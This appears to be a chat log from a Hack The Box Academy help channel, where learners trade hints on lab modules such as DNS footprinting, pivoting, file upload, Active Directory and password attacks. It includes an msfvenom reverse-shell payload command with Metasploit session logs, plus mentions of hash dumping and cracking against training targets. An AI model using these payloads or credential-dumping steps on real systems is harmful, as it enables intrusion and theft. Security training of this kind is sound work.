#modules

I don’t entirely understand what I’m trying to find it’s a confusing question 😭

lets rewind a bit. what's the exact question youre working on

Also with this module you'll get trailing a trailing '.' on the fqdn it's weird

Yes. FDQN requires .

FQDN Of the DNS server of inlanefreight.htb

The answer response takes off the trailing .

That's why I phrased it that way

hey guys i am back

What exactly do you want to know?

Just memories from my windows domain days about 20 years ago

okay so @half inlet do you know what the DNS server is for the domain

How do I answer that? The ip for it?

no do you personally know what it is

I don’t understand really

What is a DNS server. What does it do

It converts ip to domain and vice versa

and what dns record is responsible for identifying the dns server of a domain

Ohhh NS?

guys i said hello i am back !!

Oh I think I understand

sure

I believe the section does actually go into a bit of detail about the different record types

@coral sundial can we get a ban on this person already. They already spammed both of us already.

lul

Oh I got it!!! So ns.inlanefreight.htb is the server that I’m contacting when I’m looking for the ip for inlanefreight.htb?

This is why taking notes is recommended :) we can't commit all of everything to memory

no problem mate i have 8 other accounts

I took@notes I just really don’t understand it 😭

Ooh ban evasion

Ah then you need to take better notes: to take good notes you need to rewrite things in your own words

then lets get ya 8 bans cause youre literally too stupid to survive in this industry.

I didn’t understand the difference between a domain and a dns server

The way that makes the most sense to you

Ah

A domain is just an area

But a DNS is a server that holds mappings between domains and ips?

basically

I understand now

and some other tidbits

I thought the inlanefreight.htb was the DNS server

(The target it gave me)

Nope that's just the domain

thats just thr domain

Ah okay

inlanefreight.htb doesnt even need to have its own IP even

its just an abstract thing

I understand now I think

@half inlet
Maybe this will help you

https://www.cloudflare.com/learning/dns/what-is-dns/

most places in real life simply default redirect the domain name alone to their main webserver

Module: Linux Local Privilege Escalation - Skills Assessment
Anyone get a shell WITHOUT using SSH credentials?

that the one with the optional hard route? yeah I did the optional way

To restate my example:
hackthebox.com is the domain that they own
academy.hackthebox.com and app.hackthebox.com are 2 separate subdomains under the main forest. When we visit either, or dns server says to the hackthebox.com server "hey do you know where I'm asking for is?" And if it gets a response, sends you to the appropriate area

Thank you guys! I understand that now; I’m having some issues with the last two questions but that’s about all the time I have for today so I’ll look back at it tomorrow after some rest and see if I can do better

Ah okay

@thorn urchin dying for hint

have you enumerated everything already

Everything short of bruteforcing potential URL paths with ffuf.

and have you found anything of interest

any services or web apps that pop out?

Yea I found a lot of interesting stuff. A few apps and a service besides SSH. Im on the pentester path so I've done ALL modules up to this point; exhausted all my notes except like I said just blasting everything with FFUF.

tell me specifically what stuff pops out as potentially interesting to you

I feel like I should PM you at this point. Don't wanna drop significant spoilers.

sure

ping is not a port based protocol, and wont be able to tunnel with proxychains as used in this module.

@mystic light im lost.... any hints?

what have you tried, where are you in the process?

I get nothing but denial of permission issue when attempting the procedure on Laudanum exercise...anyone else have this issue?

Good evening. I have just started and joined HTB Academy. In the first tutorial (INTRODUCTION TO ACADEMY) => Interactive Section with Terminal.

Question: Based on the commands you executed, what is likely to be the operating system flavor of this instance? (case-sensitive)

This is the result i found from the terminal: Linux htb-unoo8iw33g 6.0.0-12parrot1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.0.12-1parrot1 (2023-01-12) x86_64 GNU/Linux

And My answer was: Debian 6.0.12-1parrot1 but it says it is incorrect

what flavor of linux is that

Google: Linux flavors

I was responding to mgbaraka1, probably should have hit reply

Well yes but I'm also responding with something that will also lead to an answer

https://tenor.com/view/thumbs-up-thumbs-up-gif-20171413

well, it should be Debian. but it says wrong answer 😦

thank you guys the answer is Parrot.

Web Attacks - Skills Assessment

Note: I already got the flag using another method.

I just wanted to understand why XXEinjector doesnt work for this.
Can someone please explain?

Hello Everyone

#rules #welcome :)

thank you Marcie

not a huge fan of parrot or tails honestly. tried them both. been awhile since ive been on parrot though

@bronze plover parrot and tails are "os" or operating systems

@bronze plover tails is used for anonymity. parrot is more for a cybersecurity

This is off-topic to this channel please read the #rules

and #welcome on how to access other channels

<@&861185840277487616>

thanks

dealt with

<3

Hi, could anymore point me towards the right direction with the question "submit the administrators hash" in the windows priv esc section Pillaging. I was able to get the file I need for the hash. but samdump2 returns an error trying to read the file.

Rule #7

It's not advertisement, Just Non-Profit information

Hello guys there is a module using web proxies, i am trying to unlock, from outside before unlock it say 20 cubes, when i press unlock it says 100 cubes?

Presumably the 20 cubes are the ones you get back after completing the module.
With each module you get back 1/5 of the cubes

Here is an example from another module
Number of cubes (circled in yellow) that the module costs.
Above the number of cubes you get back.

So for us to keep on going in htb challenges sooner or latter it is needed to buy cubes?

@acoustic owl

Yes

Okkk!!

I had that feeling from the start

But its a great way to spend the cash

Take a look at the offers. If you are a student, there is a discount

Aint, but thank you

Its worth for the certificate they give

Do you have idea how valuable it is when searching for job? Htb cert

Currently, there are not so many certificates in circulation. This means that they are not yet so well known among the companies.

If you want a certificate that you can use for job search, then probably OSCP is currently more suitable.
If you want good training, then the Academy is the right place for you.

can i subscribe for student and do the cbbh path? or i also have to buy cubes?

Student*

For university and academic institution students

Direct access to all modules up to (including) Tier II

• Unlimited Pwnbox usage
• CPE credits submission

I think yes most of them are tier 0,1,2 there is no other so 8$ a month is way better than buying cubes or subscription at the end u have to buy exam voucher ;d
so lets say on paper u need for example 2,3 month max to prepare everything, take notes, and practice so its around $16-$24

anyone agree with me?

For the student subscription you need a corresponding email address. If you have one from your university, you can sign up for this subscription.

How long you really need depends on your skills. I consider 2-3 months to be very optimistic.
To pass the exam, you need to understand the attacks discussed in the modules really well and know why they work the way they do.

I can not get Firefox to work to be able to spawn a target. What am I doing wrong

little bit more specific

I can pull up Firefox in the academy to do a module but when I try to open Firefox says something to the affects of Firefox is down

I'm doing the free modules I'm in the first one

Amd Yes I'm a noob

screenshot?

how long should hard labs take without any hints?

out of interest what other way did you get this? I got this through XXE after logging into the admin account

That depends on your skills tbh.. sometimes e medium can take longer than a hard one @quick cloud

@dim hound I'll send it when I get off work

Its normal to spend 6 hours on hard lab?

hmnm, I can't really judge. Aslong you learned from it and make notes. So, when you encounter again in a similar environment you should be able to solve it in a short time period.

ok

I need a hint for Footprinting - Hard I have a shell for the user but I cant find the HTB password

pm ; )

Can anybody help me with the XSS - Skills Assessment?
I already set up my php server and send all the payloads i found from the module through the webform but i dont get any response on my http server

@silent knoll pm me with your XSS payload that you are trying to use

Module: Pivoting
Section: SocksOverRDP
issue:
i have uploaded all files as required, i setup the tunnels.
i have connected to the first target, but when i try to connect to the second target, the rdp session freezes.
for more context:
||i have found that the account jason is a L**** account|| so I tried to RDP with the prefix of that account, worked out well, didn't get the error message about ||not being in the domain||, now my issue is that I can't seem to establish the rdp session.

nvm there was sth with the connection

i tried again several times and everything was alright

Yeah the pivoting ones sometimes the connection is weird.

yes i know u need .edu email and i am talking 2-3month if ur studying slow i already have skills for oscp but its expensive since this is more affordable price what u think guys?

Give it a try and see how far you get.

HTB gives 18 days a 8h for the path.
As I said, I think that is very sporty

Hi everyone. I am having a lot of trouble with the SOCKS5 Tunneling with Chisel chapter of the port forwarding module.
So the thing is that when I compile chisel, transfer it over to the pivot and run it from there, I get an error that "GLIBC_2.32 is not found". I tried using an older version of chisel (1.7.4) and I got the same result. If anyone can help, I'd be very grateful.

Use a older version of Chisel ; )

I tried the oldest I could find (1.6.0) and I still got the same error. Is there a version even older than that?

hello,

does anyone know if there is a known issue on AD Enumeration & Attacks - Skills Assessment Part II with importing the PowerView.ps1 module? Im on ||MS01 with elevated privileges|| but I cannot get it to work, seemingly it imports but then none of the commands do anything (no error message either) (ActiveDirectory module does not load either)

I remember that I used a older version in order to get it to work. I don't specially recall which version. @crimson walrus

did u download it from here: https://github.com/jpillora/chisel/releases

Yup

Does anyone have Hack the box exhibition ctf acces key ?

I am working on the DNS footprinting module and I am not sure what wordlist to use to find the FQDN of a subdomain. I have tried like 10 wordlists to bruteforce, can anyone nudge me to the right list?

DM me

Hey, sorry to bother you man but I tried every possible version of chisel (down to 1.3.0 since earlier versions cannot be built with "go build"). Is there any tips you could give me as to why it may not be working? I don't think my problem is the version itself since the error does not change regardless of which version I use.

@crimson walrus https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_linux_amd64.gz can you try this one

I don't have in my notes, which specific version I used. But I remember that I had to use a older version

Only 18d access?can u clarify more?

HTB specifies a time frame for each module or path. This should serve as an indication of how long you need for the respective path/module

1 day = 8 hours

But this time frame depends very much on your knowledge

Yes, it worked. Until now I was downloading the source code of 1.7.6 and compiling it on my own machine and it didn't work. But when I downloaded the executable itself and transferred it to the pivot, it works. So the problem was somewhere in the compilation process I guess. Thanks a lot!

I am top 500 on htb

I think i will be ok thank u

CBBH is a web-only pentest and has nothing directly to do with the machines on HTB. You have to search for bugs in web applications and have to exploit and report them.

I know already have exp in both anw thank u

Have u done the exam?

yes

How was it?

I sent u pm instead spamming here

From my point of view it was hard
Maybe this video will help you
https://www.youtube.com/watch?v=6ISUuMBzCyo

I will check it

Module "ADVANCED SQL INJECTIONS", Section "Error-Based SQL Injection": I think I have reconstructed the password reset link properly, but it won't be accepted. Could someone sanity check me? Thx!

Module: USING THE METASPLOIT FRAMEWORK
Section: Payloads
Question: Exploit the Apache Druid service and find the flag.txt file. Submit the contents of this file as the answer.

This isn't even a question about the lesson content or the question really -- Ive managed to successfully push the exploit a few times but there seems to be a network connectivity issue going on. Every time I gain a meterpeter session and grab a shell, the session times out. I ran ping against the target host in a separate tab during my last attempt and sure enough, packet loss jumps intermittently and murders my connection. Is HTB experiencing any networking issues? Ive looked at my home connectivity (no issues there), tried redownloading the VPN file, and resetting the target host (a few times, seems connectivity is okay for about 2 minutes after the reset and then it dies). Please halp.

Edit: Resolved. Connectivity finally stayed stable long enough for me to get the flag.

Argh. I keep trying to time my commands with when the target host is responsive -- I was able to run the exploit, get the meterpreter session, grab an interactive shell, find the flag, and literally as I typed "more flag.txt" the mother fluffin' session died before the response was sent back. If there is a god, he hates me eternally.

Did you switch to TCP instead of UDP for VPN?

Sure did.

Has anyone done session security skill assessment? I cant figure out what to do with the information i acquired, i honestly need like a step by step on what im doing. Or is there a machine with a similar attack that i can learn from.

Hi guys, Im stuck on a module not sure if anyone can help me out:
hashcat --force password.list -r custom2.rule --stdout | sort -u > mut_password.list
clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

• Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.

Im getting this error when im trying to use hash

using the pwnbox?

Yeaa

I cant find a way to fix it

Pwnbox hashcat is broken right now

idk of a workaround

gotta use your own station instead of pwnbox sadly

I have already cracked this to be honest Im just revising some work because I was out for a few days

But I need the password to move on to the next step sadly

yeah atm just gotta create the list locally

yeaaa doing it now

Can someone help me in broken-authentication-weak-bruteforce-protections module?

Hey guys, for AD Enum & Attacks Skills assessment 2 question 9: Obtain credentials for a user who has GenericAll rights over the domain admins group

Tried using powerview but it isnt working…confused as hell! Any nudges?

Module: USING THE METASPLOIT FRAMEWORK
Section: Meterpreter
Question: Retrieve the NTLM password hash for the "htb-student" user. Submit the hash as the answer.

Okay. Successfully exploited and currently have system level access to the target host. When I run 'hashdump' in meterpreter it spits out the following error:

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

I tried migrating to a new process just in case that may have been the cause. No success. Any ideas on what I'm missing here?

Edit: Im an idiot. Resolved.

Apparently only for the eu academy

How do I get the host name of an IP? Tried using host [ip], but it keeps saying that the host isn’t found

I’m on the same problem as yesterday now haha @fathom pendant

The question is “What is the IPv4 address of the host name DC1”

Getting this with the host command but I used both the ip it gave me, some it said when I dug AXFR records, and even tried 127.0.0.1, but it gives me the same result every time

Wait I think

I figured it out

Nice i got it, I didn’t realize the subdomain name and the host name were the same thing

Can someone pls help me, I'm stuck on FILE UPLOAD ATTACKS, Whitelist Filters - I found an extension that gets uploaded into the server and yet when I try to access it, I get error 404 (not found)

Ohhhh wait it’s dc1.internal.inlanefreight.htb so the dc1 is the host but the internal is the subdomain

I get it now

Eh kinda sorta. Subdomain names are mostly arbitrary. The only reason you see www.example.com is just convention

can any body help me with footprinting - smb section last question

i m not able to find the full path of the share

i already tried enumerating it with rpcclient

Take a look at the filepath it gives you. That looks quite odd for a Windows machine

And the samba service is a Linux service

Now I’m having a problem with this question 😭 I tried AXFR for each subdomain I found from digging AXFR for the original domain, and none of the ips end with 203

Dnsenum on each of the subdomains you found originally, with a quite fierce hostlist

Alright

i tried with /home/smbuser/

So close

Remember full filepath of the share

||i tried with /home/smbuser/sambashare/|

Im not home ATM but let me double check

Give me like 20 min to be home

yeah sure

pls, I've been stuck on this for days

Tried using the fierce hostlist and all it got me were the ns and mail1 hosts 😭

Neither of which end in 203

Sir

Read what I said again

Run it against the subdomains

Aka the x.inlanefreight.htb

Ah sorry

Got it, thank you

Try with a simple php echo in order to validate the extension you have can execute php code

it still doesn't work, it keeps returning 404 error code

Then go a step back and verify the extension(s) that you are using are actually uploading a file

the server response is usually - "File successfully uploaded" which indicates a 200 response

I got the following response:
HTTP/1.1 200 OK
Date: Wed, 19 Apr 2023 19:35:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

File successfully uploaded

so I assumed it worked

So far so good, now verify where the file is being saved

according to the section it should be at the /profile_images folder

feel free to investigate

ok, I'll try finding a different folder

you can use the website's page and devtools (inspect)

well it seems to be the right folder from what I see when I went into devtools

so what else might be the problem?

path, file 🤷

can I dm you?

sure

someone who completed password attacks

i got in the smb

but i cannot list the files

dm me

Trying to enumerate a SMTP service on Footprinting module; Used the names they provided in their resources with the smtp-user-enum tool but turning no results 🤔

Trying a different list from SecLists now but it might take a while lol

It actually may be an issue with how I’m using the tool - I tried to use a user that I know for sure exists but it said no results

Anyone know what’s going on here? Im not sure what I did wrong

Change the timeout (-w) to like 25

SMTP is a slow service

If you're ever curious about a tool generally doing man <tool> will give you all the available options

Yeah I tried that haha. Turns out the documentation on the GitHub for the tool is incorrect 😰 it states that to change the initial timeout it is —timeout-init (seconds), but after looking at the tool it is in fact -w

Hey guys, for AD Enum & Attacks Skills assessment 2 question 9: Obtain credentials for a user who has GenericAll rights over the domain admins group

Tried using powerview but it isn’t working….tried using bloodhound-python and it also didn’t return anything favorable…completely lost at this point…anyone past this part yet?

dm

Hi, I'm in the AD Enum & Attacks Skills assessment 1, found the user for the 5th question, also have the ntlm, but cannot crack it. have tried few dictionaries and also brute force. could you help?

||You don't need to crack it.||

The question is Submit this user's cleartext password.
So, I need to get it in another way?

||Yes, you can obtain the cleartext password without cracking the NTLM hash. You can dm me if you get stuck.||

Cool, Thanks, I'll try again tomorrow

anyone do the Windows Priv Esc Kernal Exploits and get an error with the Metasploit part?

not sure if its the payload I used or maybe just the box.

Payload used

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe

*] Started reverse TCP handler on 10.10.14.214:8443 
[*] Sending stage (200774 bytes) to 10.129.43.13
[*] Sending stage (200774 bytes) to 10.129.43.13
[-] Meterpreter session 1 is not valid and will be closed
[*]  - Meterpreter session 1 closed.
[*] Sending stage (200774 bytes) to 10.129.43.13
[*]  - Meterpreter session 2 closed.  Reason: Died
[*]  - Meterpreter session 3 closed.  Reason: Died
[-] Meterpreter session 2 is not valid and will be closed

hi can someone help me with my code on the bash module?

This is for the conditional code execution section of BASH scripting module

#!/bin/bash
#count number of characters in a variable
echo $variable | wc -c

#variable to encode
var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
    var=$(echo $var | base64)
done

$count = ''

for counter in {1..35}
do
    $count = $count + ${var:$counter - 1:$counter}
done


echo $count{${#counts}}

i can help. dm

Ok I will do you now but I’m about to get dinner. Are you available in maybe 2 hours ish?

ill dm you with some thoughts and go from there.

Ok thanks

I have a really stupid DNS question, I feel like i'm missing something. Anyone know why when using NSLOOKUP you get errors and no results. even if I specify the NS i get nothing returned. but if i switch to DIG i get results

words to live by, my boss says this all the time lol
it's not DNS
There's no way it's DNS
...
It was DNS

You're not specifying the NS in your nslookup command, try nslookup -type=ANY 10.10.34.136 10.129.129.3 ?

Sup folks! Hope you're good!

I'm on File Upload Attacks - Client Side Validation.

When I try to use the upload button, I got an error on the dev console saying that file is not defined.

I'm wondering is this is intended or not. Does anybody knwo about that ??

I have tried, just didn't show in the screenshot
but it doesn't matter if you specify the NS it returns nothing

Ah, i'm not sure then...

gonna try gobuster see what it comes up with, though the example mentions using patterns and right now all i care about is subdomains, i'm not number matching yet

did you choose a new image by clicking on the shadow man?

Thanks buddy. I thouhgt that to open teh file selector I had to click on upload instead.

hey is anyone available to assist me with file upload attacks module. black list filter section. i was able to find 3 extensions that were accepted by the back end server but none of them seem to run the code. all the others ive tried are not accepted via blacklist

actually belay that. i found more extensions

got it

i'm just an idiot, missed the second zone

Hello, I'm doing the hard question in footprinting lab. I was able to find the ports ssh, pop3, imap, dhcp and snmp as open. I got the credentials for tom and when I try to ssh using those credentials, I was getting an error like permission denied (public key). Am I on the right track?

that's because ssh requires a publickey for you to access with

but maybe his credentials work on a different service

:)

ssh key for this lab*

Thanks

Tried those creds with imap and pop3. But the inboxes were empty.

Just because the inbox is empty maybe a folder isn't

Everything is showing as Has no children. Maybe I should look again carefully.

Has no children just means there's no subfolder

It does not mean empty

Okay

Thanks

Thank you @fathom pendant. Got into the SSH and found the answer.

how do i remove the copyright message from ffuf output

ok thanks

Is there anyone who can give me a nudge on the Attacking Common Applications LDAP injection section? I am having no luck figuring it out...

hi, i can't access all rdp labs in active directory enumeration and attack module. It was incorrect username or password error w/ provided credentials (htb-student, Academy_student_AD!) . how anyone access it?

Hi, you don't need to delete anything (well it's up to you) just read the man page. In this case you can use "-ic" (ignore comments)

Hey folks

I am still stuck on password attacks hard lab, ||I found hashes and cracked admin's password but still can't use it anywhere.||, I think I have used every tool and method I could think of. Can I dm someone?

Maybe that password is used not only by the admin

It's a bit tough, especially the skill assessment but the module is really good! - Advanced Sql Injections done

Hey Guys, struck with active directory skills assesment 2 Q7, I'm not sure which credentials to use and which IP to use. I logged in to the msssql using two users BR086 and AB920 but both didn't have permissions to execute a command. Help would be appreciated

net user shows only 3 entries, I have tried it against all of them using different methods: locally, remotely (rdp, smb).

if you are the J user, then you have a file that you can use, once you have the file under your control (e.g. can see something inside) that thing can help you get another user

that user has certain extension (file) that can be opened containing hashes, that can be cracked

Are you referring to L***.kbpx?

yes

I have already gone through that stage

and I assume you are trying to log in with that password as someone, right?

the password ||I got from k**pa** was used for david ||
||then I got the vhd file, mounted it and found the sam files, cracked them and found a password and idk what to do with it||

Hey i want to start on cybersecurity and the channels are a lot and its very overwhelming

so far so good, try to log in

that's the issue, it doesn't work, I tried to login via rdp, smb and locally

what about winrm?

it didn't work too

secretsdump as well

I'm pretty confident that winrm works

Either you have a wrong password, or you are not submitting the password correctly

nope

so what am I supposed to do with these sam files if the cracked password doesn't work?

use a different wordlist maybe?

hmm, I have used 2 the one that was given and rockyou

perhaps the administrator had a mutated keyboard

yeah I tried a mutated list

keep trying, the password that you mentioned is not the correct one

okay I will dig it again

Hi guys. I need help with the ICMP Tunneling with SOCKS part of the pivoting module.
It has come to my attention that many of the tools showcased in this module do not work properly or need a lot of fine tuning to work properly. The problem I have rn is with the ptunnel-ng tool. Running the script autogen.sh does not work I cannot find a way to build the executable on my Kali. I read online that a solution would be to get an old Linux mint (maybe also other distros) and run it from there. I have no idea if that will work. Before I go down the rabit hole of installing different VMs and setting them up just to get this tool to work, does anyone have any tips? I have already spent quite some time on this module and any tips that could cut the trial and error time would be much appreciated!

Just use a different pivot method. Thats legit the only tool that I didn't bother with

Yep, in the end I just used chisel. But it would have been nice to know how to make it work just in case I ever have an engagement where I need it.

Thanks!

Enumerate the target Oracle database and submit the password hash of the user DBSNMP as the answer.

While using ODAT, i keep on getting new SID everytime i run the scann

Because you're not gonna get the dbsnmp hash with odat.

You are given a user to work with for starters

Just follow that section to a T

I know, what i possibly think is ODAT is going to return a account > login > enum for the hash

Look carefully you get a 'username/password' combo

Aah, thankyou j went thru everything again

Ye

And that section you can literally follow all the steps it tells you :)

i overcomplexed it way too much honestly

Yep

The enum part is literally using sqlplus

Tried:

• https://medium.com/@benichmt1/secretsdump-demystified-bfd0f933dd9b
• https://medium.com/secstudent/using-john-the-ripper-with-lm-hashes-f757bd4fb094
• rockyou, mutated list
• john shows password cracked but there is no password, even crackstation gives me a null string
  at this point I would like to know what I am doing wrong

why are you mutating rockyou

I didn't

I mutated the given password list with it's rules

the first and the second post will not help you much, but to see the hashcat mode that you need

the admin ntlm hash is crackable

unless, the script you are using to extract the hashes is giving you false positives

I used the major samdump2

can I paste the hash for a quick moment @autumn pilot ?

can anyone help me to solve this questions from windows fundamentals -----Find the SID of the bob.smith user

Feel free in a dm

done

Get-WmiObject

let me try this

i dm'ed you

i am on live engagement in shells and payload and doing host-1 and password for tomcat is ||Tomcatadm|| (it was given in the hint). and this is not an default credential. so i could not have done this without viewing the hint. right? am i missing something?

Did you check the text file on the desktop of foothold machine?

i guess i am blind thx btw

happens, no worries

I have completed that module so if you get stuck anywhere, feel free to dm me

Hello

I'm a newbie

I'm searching for someone who's gonna guide me to become a good hacker

Google can be your best guide ; )

I've tried and watch a lot of videos but it doesn't help

I'm searching for a teacher, i will be his/her disciple

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

I would recommend to watch: ippsec Videos

Thanks❤️

chatgpt will be better

hahaha lol

Only for bare minimum info

it can save your time better than google

It depends

ChatGPT can be confidently incorrect if documentation is incorrect

chatGPT can be useful, but if you type "mssql statement enumerate tables" it prints out.. but if you go do the researching yourself.. I am sure you will learn more from it

Not to mention if you want 24/7 access, you need to pay for it

Google is free 24/7

Also videos can do a better job at explaining than text

Especially ippsec videos

Thanks, I'm very glad for your help

I promise to be a fast learner and join you, and I may message some of you if i don't understand one or two things 🙏

google is a pile of garbage

you should know exactly what you are looking for

Just ask the question in this channel if you get stuck

Okay, thanks

how to get user path using Get-WmiObject

Idk bro haven't done that

no bro , i am litttle bit confused

Try this

Get-WMIObject win32_userprofile -filter "special = false" | 
Select-Object LocalPath

https://social.technet.microsoft.com/Forums/ie/en-US/56903d8c-f56c-4079-a11f-826e5b133464/powershell-help-filtering-and-displaying-special-output-of-getwmiobject-win32userprofile?forum=winserverpowershell

i tried this but still don't get all user info . it is not showing about user bob.smith

I believe you need to replace "win32_userprofile" with the username you have

let me try

not working

¯_(ツ)_/¯

You should be able to filter with where

https://devblogs.microsoft.com/scripting/use-powershell-to-find-detailed-windows-profile-information/

thanks for help , now it is working

someone who completed password attacks?

i dont know why im getting this error using hashcat

``clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

• Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.``

am using this command

hashcat --force password.list -r rule.list --stdout | sort -u > mut.txt

trying to do the skills assessment on file inclusion and RCE. i'm no longer able to see the logs being updated after reaching the "admin" part of the assessment. anyone else have this problem? nevermind - reset fixed it.

Alright. I've tried for 3 days... a brother needs help

I'm on the PenTest Path and on Footprinting - DNS
currently stuck on 2 questions:
" Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain."
and
"What is the FQDN of the host where the last octet ends with "x.x.x.203"?"

Now I'm seeing on forums that they updated a /etc/host file and I'm missing the point to even doing so when the files are no where to be found.
Assuming I have to make that directory but It still doesnt explain the configuration section

hello everyone

im trying to use nc to listen on port 80 but it keeps on quitting

how do i fix it?

HI, the address is already in use. What do you have listening on that port?

idk

how do i check that?

netstat -tpnl

there is no program name

I think to see the process you need to have root priv. Anyway can you do a curl on that address?

it may be a python simple server or apache, mine it's just a guess

use a different port, 80 is occupied by a service

i need this port cuz im listening on http

you could do it in this way if you didn't start that service yourself by mistake

you can use a different one

how will i listen on http then?

use port 443

depends on what you are trying to accomplish

there are python modules, php, npm and so on

i just want to set up a listener

you can setup the listener on whichever port you wish as long as it is not occupied

what type of record would tell you the DNS server
Subdomains of subdomains

im in the xss module in the phishing section

i cant use another port

what makes you think that

cuz http is on port 80?

so, basically you are assuming that the bot will visit only http?

is there a way i can kill the process?

yes bc its a phishing link

i wouldn't recommend killing the process on port 80

I've seen in forums about the fi3rc3-h0stlist.txt sub

but that failed

Well that's probably because you're running it only on inlanefreight.htb

But a subdomain would be x.inlanefreight.htb

But the first question; how do you query for a Name Server

right

using the dig ns command.

There is a subdomain you can use with dnsenum and the "fierce" wordlist to get the x.x.x.203

If you put the IP in your /etc/hosts it messes up dig

I feel like its the root subdom and im being an idiot.

Nope

You're missing something obvious

I have found the password for mssqlsvc user on attacking sql databases section but I am not able to login. I tried logging in using available clients in Linux and also the microsoft sql studio. Any hints where should I look for?

Maybe it's not accessible from outside the users network

was that for me MarcieLee?

Yes

Thanks for hint, I will see what I can do

It's been a moment since I did that one

And not home to assist further

does mssqlclient.py work?

for htbdbuser yes

Why create an entry in the /etc/hosts file? That makes no sense at all in this lesson. There is a DNS server running on the target IP that you can query.

Because the forums

Are dumb

^^^

Btw if you are adding a DNS server, it wouldn't be the /etc/hosts

I know I had to create my own service to reset the DNS BC for SOME reason that file wants to yeet itself off my system

There are obviously many people who do not understand how DNS works. Maybe we should write our own module for this....

but the lessons arent as much help either IMO. that or Im having trouble understanding everything

The lesson is fine, it's just you're overlooking something

This section does not require the adding of IPs to your /etc/hosts.

Nevertheless, it is one of the most frequently asked questions here

Fair

valid

I figured as much.

Anyone please help me

The task is to find all DNS zones

Take a step back; what does DNS stand for

Domain name service

Remember that you can configure zones to allow zone transfer only from certain servers

I'll let bunny take over here lol I'm at work

thank you love

I am at home and have time off.
So lets go

BET

ok so If we're thinking about configuring zones. we need to do the dig axfr command for a transfer

or am I wrong

@misty cedar wrote me a DM, so we do not spoil too much here

ok ok

can someone help?

yes, don't use port 80

omg

doesnt work

the section itself says i have to use port 80

Go ahead ask your question

That's just an example

ports under 1000 are reserved, use sudo

i did

Well if they're running a web service (like nginx or Apache) then it's already bound

is port 80 being used for something else?

You can also try using 8080

.

it doesnt work

its not getting anything

Visit http://localhost/ to see what may be running on it

You're using pwnbox yes?

yeah

Ah

That's why

Port 80 is what's being used to forward the request to the browser for you to use pwnbox

what am i supposed to do then?

Can you change the payload to use a different port?

i think it worked

it did

thanks

@fathom pendant

i cant believe i couldn't think of this😅

No problem, you were looking at the problem the wrong way :)

add the flag -ic

Hey guys, I've been struggling with taking notes while learning, and I've been curious about how you all approach note-taking and structuring everything.

any resources for taking pentesting note effectively?

i personally use notion for my notes

i write stuff in a way i can understand later

I used gitbook for a while and took notes as I learned and saved them directly into gitbook which became dull and problematic. You need one notebook to keep note of everything you do such as trial and error during solving a challenge and then later you need to transfer notes and organize them into a more readable structure like gitbook.
This way you learn a thing or two and don't miss things when organizing.

I used cherrytree for trial and error

Look at this module https://academy.hackthebox.com/module/details/162

I'm an Obsidian man myself. However - Quick one - I'm just trying to finish off the Login Brute Forcing module (Skills Assessment - final Service piece)but it keeps kicking me out or stopping because of too many errors - Any ideas? Also down to take hours for each attempt.

Try limiting your attempts to x per minute

Or something like that

I'm using -t 4 and I've now resorted to single username and password file so it at least finishes.

I'll see what happens. - cheers @fathom pendant

I'm just rubbish at multitasking so end up watching the terminal 😉

AD Enumeration and Attacks was a fight but hella good module

I still use gitbook but keep my methadoloy notes and notes for boxes and challenges seperate but yeah gitbook is kinda wonky if you just want to jot stuff down

I've just begun writing everything in codeblocks when it comes to challenges/boxes

#Getting started Module: I am trying to run the privledge esculatino script LinEnum.sh with proper +x permissions set but its not getting me any output neither on the attack box nor on victim machine. Can some one guide what could be the issue. The script gets executed but no putput or error is received. I have cloned the scripted from github .

i can help if you need. dm

Hi !
It seems I have a problem on the Academy module 'Attacking web applications with Ffuf'
I have locked one of the answers and the Submit button stays grayed out and it doesn't validate.

If you hit submit and it turns green... Then it was correct lol

What I'm saying is, i can't validate anymore. Can't change the text in the textbox.
It's as if the answer is correct, but it doesn't turn green

... sir

Listen carefully

It is submitted already

It is correct

It will not let you make changes

Because it is submitted and correct

Forgot to mention that the main issue is that it didn't validate the chapter

Yet as you say the answer is correct

Refresh page

Tried that, also tried logging out / in

Hey, at password attacks module, at password mutations section I can't get the flag as the target disconnects before the attack finishes. Any suggestion on how to cope with that?

😦

Then contact support in the bottom right if you don't get credit after finishing the rest of the module

Change threads you're using

Also you should be mutating the password.list based on the custom.rule in the resources

Not based off the random arbitrary rules they give you in that section

I have done both of changing threads and mutating the password.list based on the custom.rule in the resources

You should be able to add time to the lab as well

Each lab allows you to add time up to a total of 6 hours

hmm that I didn't know, thanks!

someone who completed password attacks?

Yes

A few people seem to have completed this module 😉

https://academy.hackthebox.com/achievement/347470/147

i got a trouble in the section password mutations

it takes hours to crack the password

i'm pretty sure there are quite useful hints in this channel about that

Yes, the attack here lasts a very long time.

Whats your guys preferred method of taking notes with obsidian

#modules message

do you take notes on a service and the tools you would use to enum and exploit
or
Do you make a folder of tools backlink how you would use em

thanks

Oh yeah no if you're trying ssh

You're not gonna get anywhere

I am trying to use go buster and when I enter the path for the common.txt file, It says that its not there, but I looked for it and it is there, so can someone pls explain what I am doing wrong

Are you using the full /path/to/file?

yes

I am entering it like I see in the example

Is it in the same location as example?

yes

Hi, Thanks, let me check the script one more time. If it doesnt work will let you know.

ok I dont know why it didnt work, but when I entered the path one word at a time and auto tabed, it found it

I can't seem to connect to the machine at the end of the active directory module, when I ping the machine it says Destination Host Unreachable and when I try with xfreerpd it says broken pipe. Other machines in other modules work fine. How can I solve this?

Spawning a web instance works and I can ping the machine, but I can't do it with my own machine through vpn

need help on sqlmap assessment. Found ******.php I can exploit it but i cannot retrieve database names

I am doing Attacking Common Services: Attacking DNS but i get errors such as

